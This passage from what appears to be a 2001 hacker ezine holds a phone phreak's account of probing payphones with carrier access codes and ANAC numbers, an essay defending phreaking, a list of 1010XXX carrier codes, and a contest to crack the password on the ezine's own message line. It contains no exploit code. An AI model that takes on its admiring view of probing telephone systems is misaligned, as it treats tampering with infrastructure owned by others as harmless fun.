Below is the factual account of one phone phreak's early morning journey. I figured it would be amusing at best and a space filler at worst, so here we go.

4:33AM

The sun wouldn't be up until 5:30, so I figured now would be as good a time as any to go out and play around with the phone system for a while. With the days of the blue box gone, it's somewhat disappointing having to find new ways to get where you want to go, and yes I admit it…sometimes I do it legitimately. But hey, maybe that will show people that hackers and phone phreaks aren't out there to rob anyone, they're just doing what they find fun. For me, it's the thrill of getting a call to go where I want, how I want.
Back in the blue box days, this was easily accomplished by gaining control of a switch and routing the call yourself…but today this luxury no longer exists. Alas, I wasn't going to let that stop me. At approximately 4:33 I hopped in my car and drove off into the early morning darkness.

4:45AM

My first stop would be the first of two local malls in my area. Hopping onto the freeway, which was eerily empty at this hour, I sped off doing a blazing…well ok I was going 62, but hey I'm not crazy like some of you. It only took ten minutes for me to reach the mall, and when I did I saw that it too was empty. There was the occasional car here and there, mainly night crews and security guards I suspected. Adding to the small amount I parked my car (close to the others I might add, as to avoid suspicion) and headed for the side of the large castle like building. The sky was still dark and speckled with stars as I approached the first phone booth. It was a sturdy looking one mounted on the wall (ok so maybe the expression phone "booth" is a little outdated for the US, but you get the idea) and I wasted no time in picking up the receiver. I did the usual stuff, most of which I won't reveal for my own safety, and had a blast.

One thing that I can mention is a little experimentation I did with carrier access codes. I had heard that some payphones allow their use, while some will only give you the same carrier over and over. For example, dialing 10-10-222-0 for an MCI operator would only get me AT&T! No matter what carrier access code you dialed, some phones would only allow you to use the long distance provider that the phone was set for. Out of curiosity I dialed 10-10-333-0, and sure enough I got Sprint. At the risk of this payphone having Sprint as its long distance carrier (very doubtful, but still possible) I tried 10-10-288-0 for AT&T, bingo! AT&T. Alright, so this phone was a nice one and would let you dial whichever access provider you wanted.
I had some more things to try, but first…I desired a new location. 5:01AM After cruising back down the highway and nearly getting killed by the enormous tractor trailers driving like maniacs I reached my second destination, a rest stop in the proverbial middle of nowhere. Sure it was on the side of the highway, but it was surrounded by thick woods and was the kind of place where the clerk got a little nervous if you walked inside. To his relief I, the black wearing hacker type kid, did not go inside. Instead I focused my attention on the bank of payphones beside the picnic area. Immediately I dialed 10-10-288-0 and got AT&T. Knowing I could dial any 800 number for free, I entered in a few ANAC's I had handy. The call went through and I received the number of the AT&T center I was calling through as the ANI readback, pretty useless, but fun nonetheless. Of course, dialing an AT&T number that was operated by the AT&T center I dialed through wouldn't work, oh well. That was fun, I figured I'd go use the bathroom and fill the clerk with dread… 5:17AM After my reign of terror (in other words after I had the nerve to walk into the rest stop at 5 in the morning) I headed for my next location. This was the place that I heard would not allow you to use a different carrier, and I was most intrigued. The phones there were in a small rest area on the side of a building (the place was a school by the way). Picking up one of the receivers I dialed 1-700-555-4141 and received the AT&T message. Knowing they had AT&T, I did what any other self respecting phone user would do…I dialed 10-10-811-0 to get VarTec (or NOS if you wanna be picky). AT&T. What the hell? How dare they not let me use the carrier I wished to! Do they think I'm stupid or something? Do they think that no one in this school knows they have the right to equal access under law? This simply would not be tolerated, why should I have to dial some 800 number to reach the operator I desired? 
Feeling my blood boil (well maybe not boil, but there was a sizzle!) I dialed 00 and got the long distance operator. "AT&T how may I help you?" they mumbled. "Hi, I'm trying to use a carrier access code on this phone, but it keeps directing me to you," I replied, doing my best to sound confused. "That's not us sir, that's the local provider, you'll have to deal with them." "I really don't have the time, can you connect me to a different carrier?" "No sir I don't have that capability."

Oh, so the phone company can't dial a number all of a sudden…I don't know about you, but that kind of scares me when you consider how much of the world they own. Still I wasn't about to lose my cool, it wasn't in my nature. As calmly as I could I hung up the phone and dialed 0. "Verizon how may I help you?" Ugh, shiver, Verizon...very bad, mucho baddo. "Hi operator, I'm trying to get long distance, can you connect me to a specific provider?" "No sir you have to dial that directly using their access code." "Oh I know, but this phone won't let me it keeps giving me AT&T." "Hold on one moment sir."

Ah success, right? It had to be a good thing she was checking to see what the problem was and it would be rectified. But then I heard it. "AT&T how may I help you?" AAAH!!! The damn Verizon operator put me through to AT&T!!! I didn't want AT&T!!! I had other ways to try still, but I figured this would be enough.

5:30AM

That would also be enough for this first payphone odyssey. Maybe it wasn't as informative as other articles, but I sure had a lot of fun writing it. I look forward to writing some more because I'm always doing these little phone trips. But, to conclude this story, I took the long drive home and picked up my own phone. As the sun came up there were still a lot of things left to try before I went to sleep.

-TO BE CONTINUED-

9.
PHONE PHREAKING IN THE NEW MILLENNIUM: by Argonaut

While traversing the internet one fine evening, I came upon an article that somewhat frightened me at first glance. After giving it a thorough read I realized there were a few flaws contained within, and I would like to address those here. Much to my, and possibly your dismay I don't have the article handy. Although I'm fairly certain you can find this topic scattered about the internet. To make up for this carelessness, I will try and relate the information from the article to you, along with my comments.

First off, the article discussed the future of telephony by explaining how more and more services will move online, a digital integration if you will between phones and computers. The author predicted that when the day arrives where we see our NIC's acting as phone jacks and our broadband connections being used to carry our everyday voice calls, the day of the phreak will have been long since past. Stating theories along with facts, the author seemed to conclude that the merging of two different technologies would bring about the end of the simplistic phone phreak because there would be little they could do. By "little they could do" the author referred to damage, because as we all know that's what hackers and phone phreaks are really about…financial gain and destroying things.

So here we have an author stating there would be little for phone phreaks to do when these two systems become one, and who also has the nerve to say that little can be done with a regular phone nowadays anyway. Let's examine this piece by piece, beginning with the final statement. There's little that can be done with a phone…well I suppose that's accurate to a certain degree. He does give notice to social engineering, which can be used to gain access to "privileged information," but makes it abundantly clear that he sees no danger from phone phreaks at this point in time.
Which I suppose is a good thing, but let's not put the final nail in the coffin! I won't say how phone phreaks can cause harm, but I must disagree with anyone who claims that phone phreaks have no power whatsoever in a world moderated by IP numbers and encryption algorithms. A phone phreak is a person who understands how your calls are routed, and with said knowledge has more power than most anyone else. The power comes from understanding a system that few ever bother to learn, and this gives them the ability to make a call the way they want to. Again, I will not humor this author by explaining how this could be used for illegitimate purposes, though I'm sure you can see. Next up, the author claims that the new technology will make the phone phreak obsolete, but first please allow me to begin a new paragraph. Phone phreaks may be considered by many to be a dying breed. With computers pushing the limits of technology few see a reason to play with their phone anymore, after all what can be accomplished? If you ask my humble opinion, I say this is something akin to techno-fear. Dreading progression and the future of technology because one is so preoccupied with its current state. But if we always remain in the past and present, what can we ever hope to learn from the future? If phone phreaks from the 70's and 80's hadn't begun playing with cell phones, would we know anything about cloning or how easily they could be listened in on today? Progression is what keeps things new, and this logic should be applied to the article I'm describing. To suggest that phone phreaks will have little power when phone calls are made through computers is absurd! Of course there will no longer be use for landline phones in your home, and many may miss that, but when computers are used for calls can you imagine all the new doors that will open? Calls traveling through computer routers which can be accessed from virtually any terminal in the world…things like that make my mouth water. 
Hackers will assist the phreaks in the computer stuff, assuming of course they don't already know, but it will be the phreaks that know how those calls are being made.

With that said, I hope everyone out there has found a new respect for the phone phreak. And perhaps most importantly, I hope that everyone has seen a few reasons why we mustn't believe that advancing technology means the destruction of older ways of hacking. After all, staying on top of the newest breakthroughs will always keep hackers and phone phreaks one step ahead of the game.

10. CARRIER ACCESS CODES

What follows is a listing of various Carrier Access Codes, which are used to route your call through a different long distance network than the one your phone is currently linked up to. Please note, prices are not listed, and many carriers have outrageous surcharges! Be sure to find out the cost before dialing. Usually operators can be reached by dialing the access code and 0, but if that produces nothing we suggest you look it up online.

All codes begin with 1010: (Unknown means a carrier exists, but it was unreachable from our calling area.)

003 - Global Crossing
004 - ATX Telecommunications Network
005 - Vartec/NOS
019 - SNET All Distance
026 - Global Crossing
033 - Unknown
040 - Qwest
056 - Qwest
063 - MCI WorldCom
070 - Qwest
071 - Broadwing
081 - Turtel Tel Long Distance Network
086 - Global Crossing
096 - Global Crossing
123 - Global Crossing
130 - Global Crossing
132 - One of the Alliance Group Companies
135 - Global Crossing
140 - Sprint
194 - Global Crossing
211 - Global Crossing
220 - MCI WorldCom
222 - MCI WorldCom
224 - MCI WorldCom
234 - Unknown
241 - American Longlines
252 - Sprint
275 - Unknown
284 - MCI WorldCom
288 - AT&T
297 - Long Distance Wholesale Club
321 - MCI WorldCom
333 - Sprint

Remember, to hear each carrier's long distance welcome message, dial the access code "1010XXX" plus 1-700-555-4141, which is free of charge.
There are hundreds more out there, so look for more codes in future issues! And remember, be friendly to those operators!

11. CROSSTALK

I think I could really help you with something, would you like my assistance/can I be a member of the crew?

REPLY> Never let it be said that Hackermind/Frequency fans don't want to help out. We would first like to thank everyone who's written and asked to assist us with either the show, site, or ezine. Your dedication is greatly appreciated. However, at this time we have no desire to bring in new members to our crew. Dozens of you have offered your services as full time writers, but the honest truth is that full-timers are not needed. When we first asked for writers to join our crew it was because so few articles were being sent in that we needed any help we could get. Thankfully people like The Blue Giant and DamienAK came to our rescue. But even with DamienAK's departure from the ezine, permanent writers are not needed. The key word being "permanent." We encourage everyone to send in their articles, and we know there are a lot of you out there. Wouldn't you like the chance to tell the world your side of the story? Others have asked to help with the show, file storage, or with being a webmaster. Again, we thank you for your interest but assure you we have it all under control.

What's this "Frequency: Special Edition" you mentioned on your message board all about?

REPLY> After receiving several requests for actual hard copies of the ezine we decided to ask our readers how they felt about the idea. The ezine will always be free, but as you know ink and paper are not. For that reason, we'll have to charge around the price of a regular magazine for the Special Edition. To clarify, anyone who does NOT purchase the Special Edition will still be able to download the ezine free of charge from Hackermind.net.
The Special Edition will simply be a hardcover edition of whichever issue we decide to use, with some added bonuses for those who decide to shell out the money. Special features may include artwork, interviews, and reader mail among other things. Aside from those, the magazine will also have graphics and other special treats to bring it to life. If you would be interested in this, or if you think it's a bad idea, please email us at screamer@hackermind.net or leave a message on our board.

What's the "Hackermind CD?"

REPLY> The Hackermind CD (working title) will be a compilation of songs heard on either the Hackermind stream or during the actual show. The first CD will have around 13 tracks and feature songs like Linkin Park's "One Step Closer," Class of 99's "Another Brick in the Wall," and of course the complete version of "Cowgirl" by Underworld, also known as the Hackermind theme. As of now we plan on having small contests, with the winners receiving an autographed copy of the CD. The first contest of course is the Hackermind Message of the Moment password crack. The first person to dial 1-800-555-8355, say "Announcements", enter 1204870 and crack the password to our message will receive the CD…if of course they email us and prove it was them by reading back our password. Other contests will follow, but some of you have mentioned you would like to purchase a copy. If demand is great enough we'll consider it, but we'd like to keep this as non-commercial as possible.

Who publishes your ezine? [Cyrus D. Riddlah]

REPLY> "Frequency: Inside the Hacker Mind" is a self published ezine. We like to refer to ourselves as Hackermind Productions when asked, but all in all it's still just us.

12. CLOSING ARGUMENTS

This month was supposed to be one of celebrating the joy of Halloween. The fun of scaring little kids by dressing up like Michael Myers and watching them in horror is something I fondly remember from years back (*ahem* 3 years ago).
But due to the sudden, and quite unsuspected tragedy that befell our country, writing this closing argument has taken on a new tone. If this is the section where I write what I, and hopefully you, have learned throughout the issue I suppose there's only one thing I can think of. No matter how hard the USA is struck by the evils of terrorists we move on and continue in our way of life. This issue dedicated a cover to those that were lost in the horrible events of September 11, 2001 but the content of the issue was unchanged. This will hopefully show that we need to remember, and yet get on with things at the same time. And with that, our hearts go out to those lost in the tragedy. I would like to mention in these closing arguments that we still need your articles! We receive some from dedicated writers every month, but we know there are more of you out there that we have yet to hear from. Please don't be intimidated, or shy for that matter. We welcome all kinds of articles, whether they're editorials or other forms of expression (i.e.: technical how-to's). There was a time when Frequency stayed away from providing information, but times have changed. To avoid appearing too much like every other ezine out there we decided long ago to be committed to expressing the views of people in the hacker world, be they technological or political. Later we saw that information was a form of expression, and to deny hackers the chance to educate each other would be to cut off a very important part of the "hacker mind." So please, send your articles into articles@hackermind.net. For those of you unsure of what to write, we will be providing some pointers and suggestions in next month's issue on how to get your articles published. Well that's just about it folks, Freq14 has come and gone. But remember, we need your feedback on the "Frequency: Special Edition" idea we've been throwing around. 
For more information, visit www.hackermind.net and head over to the Frequency section of our message board. Tell us what you like and don't like about the idea, as well as whether or not you would be interested. Alright, that's it for now, see you in November and Happy Halloween!

-screamer

13. CREW

Screamer Chaotix - Editor in Chief
Dash "Danger" Interrupt - Webmaster
Da Peng - Network Administrator
The Blue Giant - Writer

Contributing Writers: w0rm, fusys, killall(), Sad is Tic, Incogl33to, Argonaut

Shout Outs: NYPD and FDNY, the victims of Tuesday's atrocious tragedy, Buzzy, Dunceor for staying up till 4am, WSIN, Paul Partain, and of course DamienAK - we'll miss ya.

Send article/cover submissions to articles@hackermind.net along with the name you wish to be recognized by as well as a title for your work.

Tune into Hackermind, Thursdays at 10PM Eastern (0200 UTC) by opening location 166.90.148.114:9474 with Winamp or Real Player.

"I'm not going to launch a 2 million dollar missile into a 10 dollar empty tent just to hit a camel in the butt." -George W. Bush
Explaining the logic of firing missiles at meaningless targets.

"I have eight classes each and every week, this week I managed to sit through 2 of them." -Screamer Chaotix
What more could you ask for?

"What have you been smoking?" -Unreal
Apparently asking him to be live on the show was met with some hesitation

WWW.HACKERMIND.NET

Screamer and Dash Will Return in "Freq15"